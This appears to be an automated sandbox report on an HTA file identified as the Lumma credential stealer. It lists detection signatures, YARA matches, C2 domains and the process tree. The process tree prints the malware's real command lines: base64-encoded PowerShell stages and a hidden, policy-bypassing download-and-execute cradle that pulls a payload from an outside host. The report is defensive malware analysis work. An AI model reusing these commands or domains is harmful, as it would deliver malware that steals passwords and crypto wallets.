Edit tour
Windows
Analysis Report
s7.mp4.hta
Overview
General Information
| Sample name: | s7.mp4.hta |
| Analysis ID: | 1586536 |
| MD5: | b89e810109eee789002356c8bf42cdbc |
| SHA1: | b15b5bedd8474a827ec6af8e7dab5a99dfb6b2f7 |
| SHA256: | a2aeba35d01759a37002a09c830c3435d01807a7d889a6e9142c276587ce9ea8 |
| Tags: | htaLummaStealeruser-lontze7 |
| Infos: |   |
 | |
Detection
LummaC
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Encrypted powershell cmdline option found
Found many strings related to Crypto-Wallets (likely being stolen)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious Encoded PowerShell Command Line
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Download Pattern
Sigma detected: PowerShell Web Download
Sigma detected: Suspicious Execution of Powershell with Base64
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w10x64
mshta.exe (PID: 4328 cmdline: mshta.exe "C:\Users\ user\Deskt op\s7.mp4. hta" MD5: 06B02D5C097C7DB1F109749C45F3F505) 
powershell.exe (PID: 5820 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -Ep Unrest ricted -w 1 sc $env: Temp\a.ps1 ([System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring('ZnV uY3Rpb24gU 0xxKCRKRnh LeW5pail7D QooKCRKRnh LeW5paiAtc 3BsaXQgJyg /PD1cRy4uK Sd8JXskTHF sRlpScy5Td WJTdHJpbmc oMywxMDApW yRfXX0pICA tam9pbiAnJ yAtcmVwbGF jZSAiLiQiK X07JExxbEZ aUnMgPSdpZ XhkT0pjeX5 fNEc1X31nQ UZtLUAwcHF ZLnhCKW9oS 2xRTHRCdS5 XJVxhTW9JV Eh7OjE2dlZ lLypjeDdrd ENYU3c7Um5 pUXMwNEQjK DBOOWwyXCJ mRTNyNWJ7I lJaOFV7MGp 6UHZDNzU1M TU4MjIzNjU xODY5OTc3N jY1MTY1NTg n')));cmd. exe /k sta rt powersh ell -w 1 ( [System.Te xt.Encodin g]::UTF8.G etString([ System.Con vert]::Fro mBase64Str ing('cG93Z XJzaGVsbCA tZW5jIFV3Q jBBR0VBY2d CMEFDMEFVQ UJ5QUc4QVl 3QmxBSE1BY 3dBZ0FDSUF Rd0E2QUZ3Q VZ3QnBBRzR BWkFCdkFIY 0Fjd0JjQUZ NQWVRQnpBR mNBYndCM0F EWUFOQUJjQ UZjQWFRQnV BR1FBYndCM 0FITUFVQUJ 2QUhjQVpRQ nlBRk1BYUF CbEFHd0FiQ UJjQUhZQU1 RQXVBREFBW EFCd0FHOEF kd0JsQUhJQ WN3Qm9BR1V BYkFCc0FDN EFaUUI0QUd VQUlnQWdBQ zBBUVFCeUF HY0FkUUJ0Q UdVQWJnQjB BRXdBYVFCe kFIUUFJQUF pQUMwQWR3Q WdBR2dBYVF Ca0FHUUFaU UJ1QUNBQUx RQmxBSEFBS UFCaUFIa0F jQUJoQUhNQ WN3QWdBQzB BYmdCdkFIQ UFJQUF0QUV NQWJ3QnRBR zBBWVFCdUF HUUFJQUJnQ UNJQWFRQmx BSGdBSUFBb 0FDZ0FUZ0J sQUhjQUxRQ lBBR0lBYWd CbEFHTUFkQ UFnQUZNQWV RQnpBSFFBW lFCdEFDNEF UZ0JsQUhRQ UxnQlhBR1V BWWdCREFHd 0FhUUJsQUc 0QWRBQXBBQ zRBUkFCdkF IY0FiZ0JzQ Uc4QVlRQmt BRk1BZEFCe UFHa0FiZ0J uQUNnQUp3Q m9BSFFBZEF Cd0FITUFPZ 0F2QUM4QWN 3QTNBQzRBY XdCc0FHa0F jQUJrQUhrQ WR3QnZBSG9 BYVFCNUFDN EFjd0JvQUc 4QWNBQXZBR 2dBZFFCckF Hc0FOd0F1Q UdvQWNBQmx BR2NBSndBc EFDa0FZQUF pQUNJQUlBQ XRBRmNBYVF CdUFHUUFid 0IzQUZNQWR BQjVBR3dBW lFBZ0FFZ0F hUUJrQUdRQ VpRQnVBQT0 9Oy4gJGVud jpUZW1wXGE ucHMxOyBmd W5jdGlvbiB KRnhLeW5pa igpe2Z1bmN 0aW9uIHZvc k9jKCRlUFN ySlpLKXtpZ ighKFRlc3Q tUGF0aCAtU GF0aCAkSW5 MKSl7Y3Vyb CAoU0xxICR lUFNySlpLK SAtbyAkSW5 MfX19SkZ4S 3luaWo7')) ) MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
conhost.exe (PID: 3084 cmdline: C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 2300 cmdline:
"C:\Window s\system32 \cmd.exe" /k start p owershell -w 1 "powe rshell -en c UwB0AGEA cgB0AC0AUA ByAG8AYwBl AHMAcwAgAC IAQwA6AFwA VwBpAG4AZA BvAHcAcwBc AFMAeQBzAF cAbwB3ADYA NABcAFcAaQ BuAGQAbwB3 AHMAUABvAH cAZQByAFMA aABlAGwAbA BcAHYAMQAu ADAAXABwAG 8AdwBlAHIA cwBoAGUAbA BsAC4AZQB4 AGUAIgAgAC 0AQQByAGcA dQBtAGUAbg B0AEwAaQBz AHQAIAAiAC 0AdwAgAGgA aQBkAGQAZQ BuACAALQBl AHAAIABiAH kAcABhAHMA cwAgAC0Abg BvAHAAIAAt AEMAbwBtAG 0AYQBuAGQA IABgACIAaQ BlAHgAIAAo ACgATgBlAH cALQBPAGIA agBlAGMAdA AgAFMAeQBz AHQAZQBtAC 4ATgBlAHQA LgBXAGUAYg BDAGwAaQBl AG4AdAApAC 4ARABvAHcA bgBsAG8AYQ BkAFMAdABy AGkAbgBnAC gAJwBoAHQA dABwAHMAOg AvAC8AcwA3 AC4AawBsAG kAcABkAHkA dwBvAHoAaQ B5AC4AcwBo AG8AcAAvAG gAdQBrAGsA NwAuAGoAcA BlAGcAJwAp ACkAYAAiAC IAIAAtAFcA aQBuAGQAbw B3AFMAdAB5 AGwAZQAgAE gAaQBkAGQA ZQBuAA==;. $env:Temp \a.ps1; fu nction JFx Kynij(){fu nction vor Oc($ePSrJZ K){if(!(Te st-Path -P ath $InL)) {curl (SLq $ePSrJZK) -o $InL}} }JFxKynij; " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B) - powershell.exe (PID: 6524 cmdline:
powershell -w 1 "pow ershell -e nc UwB0AGE AcgB0AC0AU AByAG8AYwB lAHMAcwAgA CIAQwA6AFw AVwBpAG4AZ ABvAHcAcwB cAFMAeQBzA FcAbwB3ADY ANABcAFcAa QBuAGQAbwB 3AHMAUABvA HcAZQByAFM AaABlAGwAb ABcAHYAMQA uADAAXABwA G8AdwBlAHI AcwBoAGUAb ABsAC4AZQB 4AGUAIgAgA C0AQQByAGc AdQBtAGUAb gB0AEwAaQB zAHQAIAAiA C0AdwAgAGg AaQBkAGQAZ QBuACAALQB lAHAAIABiA HkAcABhAHM AcwAgAC0Ab gBvAHAAIAA tAEMAbwBtA G0AYQBuAGQ AIABgACIAa QBlAHgAIAA oACgATgBlA HcALQBPAGI AagBlAGMAd AAgAFMAeQB zAHQAZQBtA C4ATgBlAHQ ALgBXAGUAY gBDAGwAaQB lAG4AdAApA C4ARABvAHc AbgBsAG8AY QBkAFMAdAB yAGkAbgBnA CgAJwBoAHQ AdABwAHMAO gAvAC8AcwA 3AC4AawBsA GkAcABkAHk AdwBvAHoAa QB5AC4AcwB oAG8AcAAvA GgAdQBrAGs ANwAuAGoAc ABlAGcAJwA pACkAYAAiA CIAIAAtAFc AaQBuAGQAb wB3AFMAdAB 5AGwAZQAgA EgAaQBkAGQ AZQBuAA==; . $env:Tem p\a.ps1; f unction JF xKynij(){f unction vo rOc($ePSrJ ZK){if(!(T est-Path - Path $InL) ){curl (SL q $ePSrJZK ) -o $InL} }}JFxKynij ;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 4176 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 5776 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -enc UwB0A GEAcgB0AC0 AUAByAG8AY wBlAHMAcwA gACIAQwA6A FwAVwBpAG4 AZABvAHcAc wBcAFMAeQB zAFcAbwB3A DYANABcAFc AaQBuAGQAb wB3AHMAUAB vAHcAZQByA FMAaABlAGw AbABcAHYAM QAuADAAXAB wAG8AdwBlA HIAcwBoAGU AbABsAC4AZ QB4AGUAIgA gAC0AQQByA GcAdQBtAGU AbgB0AEwAa QBzAHQAIAA iAC0AdwAgA GgAaQBkAGQ AZQBuACAAL QBlAHAAIAB iAHkAcABhA HMAcwAgAC0 AbgBvAHAAI AAtAEMAbwB tAG0AYQBuA GQAIABgACI AaQBlAHgAI AAoACgATgB lAHcALQBPA GIAagBlAGM AdAAgAFMAe QBzAHQAZQB tAC4ATgBlA HQALgBXAGU AYgBDAGwAa QBlAG4AdAA pAC4ARABvA HcAbgBsAG8 AYQBkAFMAd AByAGkAbgB nACgAJwBoA HQAdABwAHM AOgAvAC8Ac wA3AC4AawB sAGkAcABkA HkAdwBvAHo AaQB5AC4Ac wBoAG8AcAA vAGgAdQBrA GsANwAuAGo AcABlAGcAJ wApACkAYAA iACIAIAAtA FcAaQBuAGQ AbwB3AFMAd AB5AGwAZQA gAEgAaQBkA GQAZQBuAA= = MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - powershell.exe (PID: 5936 cmdline:
"C:\Window s\SysWow64 \WindowsPo werShell\v 1.0\powers hell.exe" -w hidden -ep bypass -nop -Com mand "iex ((New-Obje ct System. Net.WebCli ent).Downl oadString( 'https://s 7.klipdywo ziy.shop/h ukk7.jpeg' ))" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) - conhost.exe (PID: 1404 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - powershell.exe (PID: 8108 cmdline:
"C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC) 
backgroundTaskHost.exe (PID: 5776 cmdline: "C:\Window s\system32 \backgroun dTaskHost. exe" -Serv erName:App .AppX43256 22ft6437f3 xfywcfxgbe dfvpn0x.mc a MD5: DA7063B17DBB8BBB3015351016868006)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Lumma Stealer, LummaC2 Stealer | Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell. | No Attribution |
{"C2 url": ["crowdwarek.shop", "chipdonkeruz.shop", "versersleep.shop", "hoppricerwir.cyou", "handscreamny.shop", "apporholis.shop", "soundtappysk.shop", "femalsabler.shop", "robinsharez.shop"], "Build id": "yJEcaG--singl7"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
| JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen |
| |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 1 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security | ||
| JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||